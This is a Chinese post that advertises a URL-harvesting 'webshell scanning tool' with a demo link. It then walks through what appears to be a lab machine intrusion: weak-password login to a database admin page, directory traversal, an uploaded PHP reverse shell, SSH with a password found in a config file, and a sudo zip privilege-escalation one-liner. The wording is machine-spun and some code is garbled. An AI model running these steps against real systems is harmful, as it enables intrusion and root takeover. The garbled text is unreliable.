webshell扫描工具

webshell扫描工具，这是一种内部有多个漏洞，可自动进行url采集，自采集多个引擎和友情链接url，轻松日出上百。

演示地址：https://note.youdao.com/s/Xi9S4I16

目录遍历攻击又称（目录爬升，目录回溯，点-点斜线),指再访问存储在web根文件之夹外的文件和目录，经过操控带有"点-斜线（..):序列及变化的文件或运用绝对文件夹途径来援用文件的变量，能够访问存储在文件系统上的恣意文件和目录，包括应用程序源代码,配置文件信息和关键系统文件。

系统访问控制（如在微软windows系统上锁定或运用文件）限制了对文件的访问权限。

nmap，dirb扫描

开放了ssh,http效劳还有111端口

dbadmin 测下下弱口令admin。直接能够登录

用扫描器扫，发现存在目录遍历高位破绽

访问下看看：能够看到etc/passwd目录下的用户

那么我们就能够上传一个shell到数据库，再监听

先将/usr/share/webshells/php 下的 reverse_webshell 复制到桌面上，设置ip和监听端口，修正名为shell.php

翻开数据库管理页面，发现假如建一个.php名字的数据库，应用遍历目录破绽时就能够执行php文件，到达反弹shell的目的

建好库后添加数据表

php shell.php");?>

胜利反弹shell！

pty优化终端,

然后在home目录下发现有一个用户zico, config文件中发现了对应的数据库的密码

那就试试ssh登录 ss

密码:sWfCsfJSPV9H3AmQzw8

登录胜利后sudo -l 发现 能够运用zip继续提权

touch exploit

sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"

提权胜利!